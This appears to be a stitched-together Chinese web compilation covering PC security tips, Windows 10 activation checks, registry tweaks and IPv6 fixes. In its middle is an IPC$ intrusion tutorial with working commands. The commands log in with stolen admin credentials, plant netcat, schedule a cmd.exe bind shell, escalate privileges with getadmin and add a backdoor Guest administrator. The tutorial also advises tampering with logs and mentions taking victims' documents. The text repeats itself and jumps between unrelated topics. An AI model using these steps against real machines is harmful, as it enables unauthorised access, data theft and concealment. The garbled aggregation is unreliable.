“提供专门用于侵入、非法控制计算机信息系统的程序、工具,或者明知他人实施侵入、非法控制计算机信息系统的违法犯罪行为而为其提供程序、工具,情节严重的,依照前款的规定处罚。”

4.能详细的说说入侵别人的电脑的步骤和原理

我们自然先来看看“黑客”常用的攻击方法。

“黑客”的攻击方法可以是你所接触到的任何东西:从键盘到硬盘,从诈骗到轰炸。下面我们就逐一列举这些问题。

1. 键盘 是不是感觉到很奇怪,为什么把键盘放在第一位呢?键盘也会遭到攻击吗?很简单,键盘是我们与外界进行沟通的重要桥梁,我们要通过它输入大量的信息,所以许多“黑客”软件都把这只“黑暗中的眼睛”放在了这里。通过记录键盘的活动,可以很容易地得到很多有价值的东西,例如密码、谈话内容。

解决办法:对付这些东西,最好的办法还是使用杀毒软件。如果杀毒软件带有病毒防火墙,需要注意下载最新的防火墙的版本。

2.浏览器 我们上网肯定离不开浏览器,这也是泄漏秘密的“好地方”。浏览器的漏洞主要是IE缓存的问题以及cookie的问题,尤其是cookie,有的cookie里面包含了你的登录网站名称、登录时间甚至登录密码。

“踏雪无痕”这类软件就是专门查看cookie的“黑客”软件。 解决办法:点“internet选项”、“删除文件”把缓存彻底删除掉. 3. 腾讯OICQ. 现在哪家网吧会把腾讯OICQ拒之门外呢?正因为腾讯OICQ的广泛使用,腾讯OICQ每一个新版本的发布都受到众多的“黑客”的关注。

从嗅探器、键盘记录器、轰炸器到偷看聊天记录等攻击方式,让人防不胜防。 解决办法:腾讯OICQ的更新速度非常快,所以要注意下载使用最新版本;在OICQ中点“系统参数”、“网络安全设置”、“拒绝陌生人信息”就可以对付OICQ的轰炸;还应该设置“使用本地信息加密”。

4. 网页浏览 浏览网页是我们获取网上信息的重要方法之一,对于网页浏览需要注意以下几点:登录免费信箱的时候尽量到指定的网站上去登录,不要在个人主页上登录,因为该网站很可能会记录下你的用户名和口令。对付无限制弹出窗口的网页(这是网页浏览时的恶作剧,可以让你的机器死机),可以先按住“Crtl+Alt+Del”键,把“EXPLORER”窗口关闭,然后再修改“Internet”选项,禁止执行Java。

对于网页中插入的ActiveX,当提示下载安装的时候一定要看清除是否签名,如果没有签名就存在包含木马的可能性。尽量到知名的下载网站去下载软件,对下载的软件最好先杀毒。

5. 硬盘共享 网吧等于一个局域网,所以对于网络硬盘的共享一定要注意,尤其是硬盘的写权限千万开不得。最好把所有的硬盘全部设置为不共享。

6. 拷贝粘贴 我们有时候会大量地使用拷贝粘贴功能来复制文件和文字。当离开机器的时候最好把剪贴板清空,尤其要注意是否使用了某些剪贴板增强工具,这些工具通常会自动记录你所拷贝的文件数量和内容,即便是非正常关机都不会消失。

7.遗留文件 不要随便打开别人遗留下来的文件。好奇心并非总是好事。

“黑客”为了使普通用户去掉戒备之心,总是利用大家最常见或者喜好的东西来骗人上当。一个图标是WINZIP的文件实际上却可能是一个木马;一款漂亮的FLASH动画背后可能隐藏了许多不为人所知的“勾当”。

8.异常变化 最后,注意计算机的异常变化。当你正在聊天的时候,突然鼠标不听你指挥了,或者计算机突然重新启动了,又或者突然出现一个新的窗口等,这些迹象表明你使用的计算机遭到了别人的控制。

最好的防范办法,是下载天网个人防火墙,切断与网络的连接,天网同时也会自动记录下入侵者的IP。 9.端口 你在网络上冲浪,别人和你聊天,你发电子邮件,必须要有共同的协议,这个协议就是TCP/IP协议,任何网络软件的通讯都基于TCP/IP协议。

如果把互联网比作公路网,电脑就是路边的房屋,房屋要有门你才可以进出,TCP/IP协议规定,电脑可以有256乘以256扇门,即从0到65535号“门”,TCP/IP协议把它叫作“端口”。当你发电子邮件的时候,E-mail软件把信件送到了邮件服务器的25号端口,当你收信的时候,E-mail软件是从邮件服务器的110号端口这扇门进去取信的,你现在看到的我写的东西,是进入服务器的80端口。

新安装好的个人电脑打开的端口号是139端口,你上网的时候,就是通过这个端口与外界联系的。黑客不是神仙,他也是通过端口进入你的电脑. 黑客是怎么样进入你的电脑的呢?当然也是基于TCP/IP协议通过某个端口进入你的个人电脑的。

如果你的电脑设置了共享目录,那么黑客就可以通过139端口进入你的电脑,注意!WINDOWS有个缺陷,就算你的共享目录设置了多少长的密码,几秒钟时间就可以进入你的电脑,所以,你最好不要设置共享目录,不允许别人浏览你的电脑上的资料。除了139端口以外,如果没有别的端口是开放的,黑客就不能入侵你的个人电脑。

那么黑客是怎么样才会进到你的电脑中来的呢?答案是通过特洛伊木马进入你的电脑。如果你不小心运行了特洛伊木马,你的电脑的某个端口就会开放,黑客就通过这个端口进入你的电脑。

举个例子,有一种典型的木马软件,叫做netspy.exe。如果你不小心运行了netspy.exe,那么它就会告诉WINDOWS,以后每次开电脑的时候都要运行它,然后,netspy.exe又在你的电脑上开了一扇“门”,“门”的编号是7306端口,如果黑客知道你的7306端口是开放的话,就可以用软件偷偷进入到你的电脑。

5.黑客DOS命令或其它命令入侵他人电脑的具体步骤

IPC$入侵 一 唠叨一下: 网上关于ipc$入侵的文章可谓多如牛毛,而且也不乏优秀之作,攻击步骤甚至可以说已经成为经典的模式,因此也没人愿意再把这已经成为定式的东西拿出来摆弄. 不过话虽这样说,但我个人认为这些文章讲解的并不详细,对于第一次接触ipc$的菜鸟来说,简单的罗列步骤并不能解答他们的许多迷惑(你随便找一个hack论坛搜一下ipc,看存在的疑惑有多少). 因此我写了这篇相当于解惑的教程.想把一些容易混淆,容易迷惑人的问题说清楚,让大家不要总徘徊在原地!如果你看完这篇帖子仍有疑问,请马上回复! 二 什么是ipc$ IPC$(Internet Process Connection)是共享"命名管道"的资源(大家都是这么说的),它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。

利用IPC$,连接者甚至可以与目标主机建立一个空的连接而无需用户名与密码(当然,对方机器必须开了ipc$共享,否则你是连接不上的),而利用这个空的连接,连接者还可以得到目标主机上的用户列表(不过负责的管理员会禁止导出用户列表的)。 我们总在说ipc$漏洞ipc$漏洞,其实,ipc$并不是真正意义上的漏洞,它是为了方便管理员的远程管理而开放的远程网络登陆功能,而且还打开了默认共享,即所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$)。

所有的这些,初衷都是为了方便管理员的管理,但好的初衷并不一定有好的收效,一些别有用心者(到底是什么用心?我也不知道,代词一个)会利用IPC$,访问共享资源,导出用户列表,并使用一些字典工具,进行密码探测,寄希望于获得更高的权限,从而达到不可告人的目的. 解惑: 1)IPC连接是Windows NT及以上系统中特有的远程网络登陆功能,其功能相当于Unix中的Telnet,由于IPC$功能需要用到Windows NT中的很多DLL函数,所以不能在Windows 9.x中运行。 也就是说只有nt/2000/xp才可以建立ipc$连接,98/me是不能建立ipc$连接的(但有些朋友说在98下能建立空的连接,不知道是真是假,不过现在都2003年了,建议98的同志换一下系统吧,98不爽的) 2)即使是空连接也不是100%都能建立成功,如果对方关闭了ipc$共享,你仍然无法建立连接 3)并不是说建立了ipc$连接就可以查看对方的用户列表,因为管理员可以禁止导出用户列表 三 建立ipc$连接在hack攻击中的作用 就像上面所说的,即使你建立了一个空的连接,你也可以获得不少的信息(而这些信息往往是入侵中必不可少的),访问部分共享,如果你能够以某一个具有一定权限的用户身份登陆的话,那么你就会得到相应的权限,显然,如果你以管理员身份登陆,嘿嘿,就不用我在多说了吧,what u want,u can do!! (基本上可以总结为获取目标信息、管理目标进程和服务,上传木马并运行,如果是2000server,还可以考虑开启终端服务方便控制.怎么样?够厉害吧!) 不过你也不要高兴的太早,因为管理员的密码不是那么好搞到的,虽然会有一些傻傻的管理员用空口令或者弱智密码,但这毕竟是少数,而且现在不比从前了,随着人们安全意识的提高,管理员们也愈加小心了,得到管理员密码会越来越难的:( 因此今后你最大的可能就是以极小的权限甚至是没有权限进行连接,你会慢慢的发现ipc$连接并不是万能的,甚至在主机不开启ipc$共享时,你根本就无法连接. 所以我认为,你不要把ipc$入侵当作终极武器,不要认为它战无不胜,它就像是足球场上射门前的传球,很少会有致命一击的效果,但却是不可缺少的,我觉得这才是ipc$连接在hack入侵中的意义所在. 四 ipc$与空连接,139,445端口,默认共享的关系 以上四者的关系可能是菜鸟很困惑的一个问题,不过大部分文章都没有进行特别的说明,其实我理解的也不是很透彻,都是在与大家交流中总结出来的.(一个有良好讨论氛围的BBS可以说是菜鸟的天堂) 1)ipc$与空连接: 不需要用户名与密码的ipc$连接即为空连接,一旦你以某个用户或管理员的身份登陆(即以特定的用户名和密码进行ipc$连接),自然就不能叫做空连接了. 许多人可能要问了,既然可以空连接,那我以后就空连接好了,为什么还要费九牛二虎之力去扫描弱口令,呵呵,原因前面提到过,当你以空连接登陆时,你没有任何权限(很郁闷吧),而你以用户或管理员的身份登陆时,你就会有相应的权限(有权限谁不想呀,所以还是老老实实扫吧,不要偷懒哟). 2)ipc$与139,445端口: ipc$连接可以实现远程登陆及对默认共享的访问;而139端口的开启表示netbios协议的应用,我们可以通过139,445(win2000)端口实现对共享文件/打印机的访问,因此一般来讲,ipc$连接是需要139或445端口来支持的. 3)ipc$与默认共享 默认共享是为了方便管理员远程管理而默认开启的共享(你当然可以关闭它),即所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$),我们通过ipc$连接可以实现对这些默认共享的访问(前提是对方没有关闭这些默认共享) 五 ipc$连接失败的原因 以下5个原因是比较常见的: 1)你的系统不是NT或以。

入侵别人win10系统电脑

IPCwin10如何入侵

IPCwin10如何入侵

能入侵win10电脑吗

1.win10会被黑客攻击吗

个人电脑由于入侵价值普遍偏低,所以一般黑客会攻击服务器,那样会更容易获取利益。但个人电脑也不排除被黑客恶意攻击的可能性。其实电脑系统并不会让黑客攻击的可能性改变,而是在电脑的安全性上有所体现。并且,个人电脑被入侵的主要方式是木马和病毒,一般不会有黑客专门入侵个人电脑。

Windows10系统如果坚持更新到最新版本的话几乎是不用担心黑客入侵。其实个人电脑一般情况下本便比服务器更难以入侵。再加上Window10自带的安全软件,对于黑客入侵是无需担忧的。

不过个人认为,Windows10上的安全软件有些不尽人意。答主可以考虑使用一些免费、付费的杀毒软件。诸如腾讯的电脑管家、360安全卫士之类的。但国产的免费杀毒软件几乎都有些广告满天飞,软件捆版的问题。在这里我推荐火绒。火绒虽然可能算不上国产骄傲,但国产良心是确实的。这个可以又自己的使用感受得出,我就不再赘言了。

愿各位能无忧地使用电脑,不要相信某某漏洞刷某某的广告!

2.勒索病毒容易入侵win10哪些端口

大部分系统均起作用,win10也不例外,但win10的安全度比较高,比较安全!此次 永恒之蓝 勒索病毒事件大部分被入侵的都是低级系统,微软已经不提供安全更新的系统。

如果可以建议使用win10比较安全!但主要是要自己做好防御措施防御方法:1.不随意打开/点击/进入/下载安装 不明 网页/链接/网页/软件等(这是最基础的)2.更新安全软件至最新版本,专门应对此次事件的最新版本,要可靠的安全软件(推荐用360安全卫士)3.到微软官网下载最新补丁,或是用360下载最新的补丁!4.这段时间最好每天都木马查杀,漏洞检测。5.也是很重要的一点,把445端口(最重要的),135,137,138,139等危险端口都封闭,关闭方法自己百度,随便一查就会有(最好选择最近的发布文章)6.使用360反勒索服务7.准备好一块系统重装光盘或U盘,以防万一。

8.也要准备好360新更新的工具 文件解密 也是以防万一。9.这一点是最重要,最重要,最重要的,那就是 防火墙 必须要开,(是必须开,而不是可以开,也不是推荐开),不然即使你申请360反勒索赔理,他也绝对不会赔给你的10.如果不闲麻烦可以开机时断掉网线,开机用杀毒软件检查无异常后在重新连网。

3.具体的入侵电脑的方法

IPC入侵攻略!其实针对IPC漏洞入侵的方法目前已经有很多的教程,但是其中很多教程并不完整,所以还是有很多网友来信问我关于IPC漏洞入侵的有关问题,这就是我写这篇文章的原因了。

如果你觉得本文也不完整,那只好去找更好的版本了,但是我希望你能把你的意见和建议告诉我,让我不断的完善这篇文章。本文参考了小榕的流光2000说明文档及其它相关文档,也包含了一些自己的心得体会。

本文欢迎非商业性转载,但请保持文章完整性并注明出处!:-) IPC是Internet Process Connection的缩写,也就是远程网络连接。它是Windows NT及Windows 2000特有的一项功能,特点是在同一时间内,两个IP之间只允许建立一个连接。

好了,废话少说,现在进入主题。 如何找到具有IPC漏洞的主机呢?以前我都是组合一个国外的扫描工具(名字我忘了)和KillUSA的LetMeIn,因为很多工作都是手工完成的,所以速度可想而知了。

现在因为有了小榕的流光2000,所以找到这样的主机实在是太简单了,具体操作我就不说了,大家可以参考该软件的说明文档。 好了,假设我们已经找到了一台这样的主机,地址是139.223.200.xxx,管理员帐号是Administrator,密码是123456。

进入命令行方式,正式开工。需要说明的是,以下操作都是在目标主机没有禁止远程IPC$连接和启动Schedule服务的理想情况下进行的。

F:\》net use \\139.223.200.xxx\ipc$ "123456" /user:"Administrator" 命令成功完成。 F:\》copy nc.exe \\139.223.200.xxx\admin$ 已复制 1 个文件。

F:\》net time \\139.223.200.xxx \\139.223.200.xxx 的当前时间是 2000/12/25 上午 10:25 在 \\139.223.200.xxx 的本地时间 (GMT - 07:00) 是 2000/12/25 上午10:35 命令成功完成。 F:\》at \\139.223.200.xxx 10:38 nc -l -p 1234 -t -e cmd.exe 新增加了一项作业,其作业 ID = 0 F:\》telnet 139.223.200.xxx 1234 上面的命令很简单,你只要参考一下net,at和nc的用法就可以了。

这样,我们就登上了远程的主机。最理想的情况是这样的,但是,也许你会遇到目标主机的Schedule服务没有启动的情况,那么,at命令就不能用了,我们就需要增加以下步骤。

F:\》at \\139.223.200.xxx 10:38 nc -l -p 1234 -t -e cmd.exe 服务仍未启动。 F:\》netsvc \\139.223.200.xxx schedule /start Service is running on \\139.223.200.xxx 登上远程主机之后,我们可以做什么呢?这要视这个帐号的权限以及该主机的安全策略来决定。

如果你的权限不够的话,可以试试下面的步骤。首先在本地执行下面的命令。

F:\》copy getadmin.exe \\139.223.200.xxx\admin$ 已复制 1 个文件。 F:\》copy gasys.dll \\139.223.200.xxx\admin$ 已复制 1 个文件。

其次,在远程主机运行下面的命令。 C:\WINNT\system32》getadmin 如果成功的话,你就是这台主机的管理员了,权限够大了吧?:-) 那么,现在我们能做什么呢?改主页?下载SAM数据库?都可以啦!方法有很多,我就不一一说了,具体方法可以参考相关教程。

我一般对目标主机上的WORD文档和数据库比较感兴趣,呵呵。

其实,如果你在这台机子上面放个木马或者病毒什么的东东,做起事来更容易一些,但是我觉得如果你跟他没什么深仇大恨的话,还是不要这么做了,这样不好。

作完了你要做的事,不要忘了做个后门。 C:\WINNT\system32》net user Guest 30906766 net use Guest 30906766 The command completed successfully. C:\WINNT\system32》net localgroup administrators Guest /add net localgroup administrators Guest /add The command completed successfully. 这是个比较简单的后门,要想做的更好一些,可以象Linux那样,做出一套RootKits来,其实这样的东东目前已经有了,你只要拿来用就可以了。

现在搞破坏真是简单多了,那么多的傻瓜工具任你用,哎!要想自保,不学点安全知识怎么行呢? 最后,我们得修理一下日志。虽然Redp0wer告诉我很少管理员会看NT的日志,但是我想修理一下还是有用的。

NT的日志在什么地方呢?可以参考XUDI的文章。但是有一点要记住的是,日志只能修改,不能删除,否则就是自己把自己出卖了!:-)这方面的命令行工具也不少,你可以到一些国外的站点去看看。

能入侵win10电脑吗

win10判断电脑版本真假

1.WIN10如何辨别正版和盗版?

方法如下:

1、按WIN+R组合键,调取运行框,在运行框中输入slmgr.vbs -dli,按回车键。

显示:操作系统版本、部分产品密钥、许可证状态。

2)输入slmgr.vbs -dlv,按回车键。

显示:最为详尽的激活信息,包括:激活ID、安装ID、许可证状态。

注:1)、2)描述里显示的是VOLUME:为盗版;

显示的是OEM:为正版。

2.如何分辨win10正版还是盗版

一、从水印印判断Win10系统是否为正版

未激活Win10正式版水印样式

Win10水印总的来说分为两大类,一是预览版水印,固定在桌面右下角,格式不唯一,这和版本性质有关(如下图)。另外就是盗版水印,这是Win10中的“新品种”,从样式来看,这才叫真正的水印:半透明字体,总在最前显示(如上图)。

Win10预览版水印样式

对于Win10预览版水印来说,由于它并不会“总在最前”显示,只起到版本标记作用,因此它对于用户正常使用影响不大。针对最近Win10 RS1预览版11082发布之后的各个版本水印格式改变问题,需要和大家澄清一下:这些版本都带有水印,而且格式就是如此,这些版本并非盗版,只是微软改变了水印格式和内容而已。

Win10未激活提示水印总在最前显示

对于未激活提示水印来说,目前看来只有一种格式。这种水印字体较大,而且能够置于前端显示,比较影响正常使用,因为实在是“碍眼”。要想去掉就得趁早激活系统。激活方法比较简单,你可以购买一个新的Win10产品密钥,也可以用自己已有的Win7/Win8.1密钥进行激活。 可直接在系统激活界面跳转应用商店购买所以,有水印的情况下,想要靠水印看穿Win10是否是盗版,是否已激活,只要看已有水印类型就可以直接快速判断:字号大,半透明置顶显示的是盗版(未激活)水印;桌面右下角白色小字的是Win10预览版水印,无须担心。

二、从系统属性入手查看

1、点击计算机

2、在弹出的对话框中点击【系统属性】

3、弹出系统界面,在下面可以看到激活信息。

3.w10盗版与正版怎么区分

1、点击计算机,如下图所示

2、在弹出的对话框中点击【系统属性】,如下图所示

3、弹出系统界面,在下面可以看到激活信息,即为正版。,如下图所示

4、或者点击【开始】,如下图所示

5、点击【设置】,如下图所示

6、点击【更新和安全】,如下图所示:

7、点击【激活】,如下图所示:

8、可以看到系统版本与是否激活,如下图所示:

4.如何辨别真假windows操作系统

目前,“电脑城”销售的品牌机(涉及到各种品牌,恕不一一列举)安装的操作系统主要是:Windows XP、Windows Vista和Windows 7(以Windows XP和Windows 7为多)。品牌机经销商为了降低成本、扩大销路,将PC厂商出厂的“裸机”或预装Linux系统,安装或改装了类番茄“论坛版”。这就形成了一种司空见惯的怪现象:安装“盗版”的“正版”品牌机。那么,如何准确鉴别品牌机随机系统是官方正版还是“论坛版”呢?

品牌机预装官方正版特征:

第一,用“SLIC Tool Kit”工具(我提供过下载)进行检验:1。主板BIOS中有与品牌机品牌对应的SLIC 2.0或2.1;2。随机系统集成了与品牌机品牌对应的OEM证书以及OEM SLP Key(注:Windows XP只有BIOS SLP 1.0和OEM SLP Key)。

第二,随机系统“安装ID”的第二个字段为“OEM”,即:XXXXX-OEM-XXXXXXX-XXXXX(鼠标右键/计算机或我的电脑/属性)。在“计算机”或“我的电脑”属性中具有品牌标识。联网到微软正版验证中心:能够顺利通过正版验证。

第三,品牌机键盘下方有随机系统“正版标识”。著名品牌机的机身背后具有防伪条码及为用户所专有的第二密钥OEM COA Key(注:该密钥为“一对一”。而OEM SLP Key具有同版本通用性)。用这个密钥激活系统后,安装ID第二个字段也是“OEM”。

如何准确鉴别系统的真伪:

目前,“电脑城”品牌机安装的类番茄“论坛版”,大多是Windows XP GHOST系统。之所以使用“GHOST系统”,主要是经销人员为了安装操作系统省时省力、简便快捷。“GHOST系统”安装ID第二个字段一般为“640”,在“我的电脑”属性中多数都有“论坛标识”和“GHOST”字样。至于Windows Vista和Windows 7,个别品牌机也有安装类番茄“论坛版”的(经销人员只要肯花时间肯下功夫,使用微软原版光盘镜像 +“硬刷”或“软改”,照样可以做到第一、二两条)。鉴别Windows XP、Windows Vista和Windows 7是正版还是非正版,主要看品牌机是否具有随机系统“正版标识”,特别是机身背后是否具有防伪条码及第二密钥OEM COA Key(即:真品证书COA。样式附后)。

——微软官方解读:真品证书(COA)是有助于识别正版Microsoft软件的标签。没有它,就没有合法的许可证来运行Microsoft软件。COA是帮助确定所运行的Microsoft软件是否是正版的直观标志。

5.怎样查看激活的win10系统是不是正版

查看Win10系统是否为正版的方法一、从水印印判断Win10系统是否为正版

未激活Win10正式版水印样式

Win10水印总的来说分为两大类,一是预览版水印,固定在桌面右下角,格式不唯一,这和版本性质有关(如下图)。另外就是盗版水印,这是Win10中的“新品种”,从样式来看,这才叫真正的水印:半透明字体,总在最前显示。

Win10预览版水印样式

对于Win10预览版水印来说,由于它并不会“总在最前”显示,只起到版本标记作用,因此它对于用户正常使用影响不大。针对最近Win10 RS1预览版11082发布之后的各个版本水印格式改变问题,需要和大家澄清一下:这些版本都带有水印,而且格式就是如此,这些版本并非盗版,只是微软改变了水印格式和内容而已。

Win10未激活提示水印总在最前显示

对于未激活提示水印来说,目前看来只有一种格式。这种水印字体较大,而且能够置于前端显示,比较影响正常使用,因为实在是“碍眼”。要想去掉就得趁早激活系统。激活方法比较简单,你可以购买一个新的Win10产品密钥,也可以用自己已有的Win7/Win8.1密钥进行激活。 可直接在系统激活界面跳转应用商店购买所以,有水印的情况下,想要靠水印看穿Win10是否是盗版,是否已激活,只要看已有水印类型就可以直接快速判断:字号大,半透明置顶显示的是盗版(未激活)水印;桌面右下角白色小字的是Win10预览版水印,无须担心。

查看Win10系统是否为正版的方法二、从系统属性入手查看

1、点击计算机

2、在弹出的对话框中点击【系统属性】

3、弹出系统界面,在下面可以看到激活信息

win10判断电脑版本真假

入侵win10电脑查看桌面

1.如何通过注册表执行Win10默认桌面背景呢

!1、使用Windows键+ R键盘快捷方式打开运行命令。

2、键入regedit,然后单击确定以打开注册表。 3、浏览以下路径:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies 4、右键单击策略(文件夹)键,选择新建,然后单击密钥。

5、将键命名为System,然后按Enter键。 6、右键单击右侧,选择New,然后单击String Value。

7、将字符串命名为Wallpaper,然后按Enter键。 8、双击新创建的字符串值,并设置要使用的默认壁纸的路径:例如,C:\ defaultwall、jpg。

9、单击确定。 10、右键单击右侧,选择New,然后单击String Value。

11、将字符串命名为WallpaperStyle,然后按Enter键。 12、双击新创建的字符串并更改其值以设置壁纸样式。

您可以使用以下选项之一:0 - Centered1 - Tiled2 - Stretched3 - Fit4 - Fill 13、单击确定。 完成这些步骤后,您需要重新启动计算机以查看新的默认壁纸。

使用这些步骤还会在您同步设置的情况下阻止使用Microsoft帐户同步壁纸。 颜色口音将继续同步,但您可以转到设置帐户同步您的设置,并关闭主题切换开关以防止发生。

2.如何在win10系统中隐藏桌面图标

很多朋友都喜欢在安装程序应用的时候生成桌面图标,虽然桌面图标是一种很好用的快捷方式,可以方便用户的操作,但是久而久之,也很容易造成咱们电脑桌面的混乱,快捷方式过多,也容易造成系统盘的负担,那么是否有什么办法可以解决这个问题呢?其实,在咱们的win10系统中,就有因此桌面图标的功能,下面,小编就来详细的介绍一下这个功能吧! 1。

首先,咱们需要返回到win10系统的传统桌面位置,之后,咱们在win10电脑的桌面上找到一个空白处,点击鼠标右键,在出现的下滑菜单中,咱们将鼠标指向查看这一项上。 2。

之后,咱们会看到刚刚的菜单旁边会出现一个新的菜单,咱们在新出现的菜单中点击“显示桌面图标”,这样,咱们可以看到这个“显示桌面图标”的勾选就被取消掉了。 完成设置之后,咱们返回到win10系统的桌面位置,就可以看到win10系统的桌面图标全部消失了。

如果大家想要将桌面图标再次显示出来,只需要根据上述步骤,重复操作一次即可。

3.如何找到电脑中隐藏的入侵的黑手

第一时间反应(养成一个好的习惯往碗可以减少所受的损失):用CTRL+ALT+DEL调出任务表,查看有什么程序在运行,如发现陌生的程序就要多加注意,一般来说,凡是在任务管理器上的程序都不会对系统的基本运行照成负面影响(注意:这里说的是基本运行,先和大家说明白,关于这条我是在网络上关于这个研究的结果),所以大家可以关闭一些可疑的程序来看看,发现一些不正常的情况恢复了正常,那么就可以初步确定是中了木马了,发现有多个名字相同的程序在运行,而且可能会随时间的增加而增多,这也是一种可疑的现象也要特别注意,你这时是在连入Internet网或是局域网后才发现这些现象的话,不要怀疑,动手查看一下吧!,(注:也有可能是其它一些病毒在作怪) 1 先升级杀毒软件到最新,对系统进行全面的检查扫描。

2 点击工具→文件夹选项→查看 把隐藏受保护的操作系统文件(推荐)和隐藏已知文件类型的扩展名 这两项前面的勾去掉,以方便查看。 3 查看Windows目录下的WIN。

INI文件中开头的几行: [WINDOWS] load= ren= 这里放的是启动Windows自动执行的程序,可以看看对比对比一下。 4 查看Windows目录下的SYSTEM。

INI文件中的这几行: [386Enh] device= 这里是放置系统本身和外加的驱动程序。外加的驱动程序一般都用全路径,如: device=c:\windows\system32\tianyangdemeng。

exe(这里只是打个比方)。

4.win10电脑的网上邻居怎么弄出来

其实,在最新的Win10系统中,已经没有“网上邻居”一说了,或者说已经更新了。在Win10中,网上邻居改为了“网络”,默认是不在桌面显示的,但用户可以设置,让其在桌面显示,方法不如。

Win10桌面显示网上邻居网络图标方法

1、首先在桌面的空白处,点击鼠标右键,在弹出的菜单中点击打开“个性化”

2、然后点击左侧的“主题”,之后在右侧点击“桌面图标设置”,

3、之后勾选上“网络”,并点击底部的“应用”和“确定”保存即可。

4、最后在Win10桌面就可以看到“网络”图标了,这个就是XP时代的“网上邻居”,点击打开可以找到相关网络设置。

5.win10怎么找到我的电脑桌面

win10此电脑图标可以通过个性化设置菜单显示工具原料:电脑+win10win10显示系统桌面图标方法如下一、从更改桌面图标设置进行添加:1、在桌面用鼠标右键+r打开个性化界面,在个性化页面中,点击左上方的更改桌面图标,点击选择。

2、、将‘计算机’以及要显示的选择勾选,点击确定即可。二、若桌面加载错误,需要重启资源管理器,重启win10的资源管理器方法如下:1、同时按着ctrl+alt+esc打开任务管理器,并选择“详细信息”2、详细信息下,有很多项内容,在里面找到“Windows资源管理器”,然后右键结束任务3、结束任务之后,桌面会变黑,然后点击右上角的“文件”选择“运行新任务”,在打开的框里输入exeplorer.exe,然后点击确定,之后桌面会闪一下,然后恢复正常。

入侵win10电脑查看桌面

win10如何判断ipv6

1.win10能看ipv6吗

IPv6是Internet Protocol Version 6的缩写,其中Internet Protocol译为“互联网协议”。

IPv6是IETF(互联网工程任务组,Internet Engineering Task Force)设计的用于替代现行版本IP协议(IPv4)的下一代IP协议。目前IP协议的版本号是4(简称为IPv4),它的下一个版本就是IPv6。

ipv6win10系统自带。 查看方法:右击桌面网络--属性。

点击左侧栏更改网络适配器设置。右击本地连接--属性。

点击ipv6--属性。点击属性即可打开。

2.如何从win10注册表中找到ipv6

原因,该服务依赖的TCP/IP 协议有问题 解决办法: 1、开始——运行——regedit.exe,打开注册表编辑器,删除以下两个键: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Winsock HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Winsock2

2、找到 C:\Windows\inf\nettcpip.inf文件 该文件为 tcp/ip协议文件

3、控制面板->;网络和Internet->;网络和共享中心->;更改适配器设置->;右键本地连接->;属性

先选择TCP/IPv6->;安装->;协议->;添加->;从磁盘安装->;然后在路径里浏览找到第2步中的文件路径找到nettcpip.inf,确定然后选择“TCP/IPv6”。对于ipv4协议重复同样的操作,最后选择TCP/IPv4,即: TCP/IPv4->;安装->;协议->;添加->;从磁盘安装->;然后在路径里浏览找到第2步中的文件路径,nettcpip.inf 然后选择“TCP/IPv4”。

3.怎样知道自己的是不是ipv6

如果没安装,请按下面安装一下

win7和vista已预装ipv6,winxp下:

1、以管理员权限登录

2、开始-运行-输入“cmd”-在命令提示符下输入“ipv6 install”

3、如果成功的话会提示:以下信息,如下图

C:\Documents and Settings\administrator>ipv6 install

Installing。

Succeeded.

4、输入命令“ipconfig /all”

这样你就能查看你的IPv6的IP地址了!

5、如果想卸载IPv6,那么执行命令“ipv6 uninstall”,然后重新启动计算机即可。

6、如果你是拨号上网,那么断网之后重新拨号。如果你是局域网,就不能保证装上IPv6是否能访问IPv6网站了。

7、访问一下地址:ipv6.google.com,看看能行不?如果还是不成功,那问问你们网管是啥原因吧!

4.win10IPv6无网络访问权限win10系统ipv6没有网络访

1、当Win10网络连接受限或出现黄色感叹号时,右击任务栏“网络连接”图标,从其右键菜单选择“网络和共享中心”。

2、待进入“网络和共享中心”界面后,点击窗口左上角的“更改适配器设置”按钮,如图所示 3、此时将打开“网络连接”窗口,右击“网络受限”的连接,从其右键菜单中选择“禁用”项。 4、待对应的网络连接图标被禁用后,再次右击此网络连接,从其右键菜单中选择“启用”项。

5、此时对于“本地连接”而言,将自动从网关获取IP地址并进行连接。而对于“无线网络”而言,则需要点击任务栏右下角的“网络连接”图标,从打开的扩展面板中点击“连接”按钮,此时就会发现网络连接正常。

6、当然,导致“网络连接受限”或“无权限访问网络“问题的原因是多方面的。 当出现此类问题时,我们需要检测一下路由器是否可以正常连接到互联网,在路由器Web管理界面中,确保“网络连接正常”。

否则就需要检测路由器端设置。 7、此外,我们还可以使用“360LSP修复工具”来修复网络故障。

利用此工具可实现修复LSP协议,解决无法正常上网的问题。 8、同时借助“360DNS优化”工具可以实现最优化网络 DNS筛选功能,从而解决“网络不稳定”或“无法打开网页”的问题。

9、当然,如果升级到Win10正式版系统后才出现无法正常上网、“网络连接受限”或“无权限访问网络”的情况时,建议使用“驱动人生6”更新或修复一下网卡驱动程序。 10、确保相关“网络服务”处于正常启动状态: 右击桌面左下角的“Windows”按钮,从其右键菜单中选择“计算机管理”项进入 11、从打开的“计算机管理”窗口上,依次展开“服务和应用程序”-“服务”项,找到“Wired AutoConfig”和“WLAN AutoConfig”两个服务项,确保这两个服务项处于正常运行状态,否则点击左上角的“启动此服务”按钮以开启此服务。

5.win10ipv6无网络访问权限如何恢复ipv6

首先在解决问题之前确认以下几项: 1、IPV6没网络权限是正常的因为你没有IPV6的网络环境,那个只有部分教育网有的,还没有普及! 2、单位设备支持的?有时候ipv6地址是对了,但是设备不支持也白搭。

3、只要路由器不支持ipv6的地址解析,做什么都没用。 如果你之前可以使用IPv6并可以连接,现在不行了,可以尝试以下方法: 方法一:进入win10系统后,我们在电脑右下角网络连接处点击网络共享中心,选择以太网,点进去发现IPV6无访问权限,点击左下角的属性,然后点击身份验证,将启动IE身份验证前面的勾去掉,点击网络,将internetIPV6协议前面的选购选上,点击确定。

方法二:1、按WIN+X打开命令提示符管理员 然后输入 netsh interface ipv6 reset,之后会提醒你重启计算机重启后再试IPV6是否可用!不同的问题可能需要不同的方法,上面家都可以试一下。

6.如何从win10注册表中找到ipv6

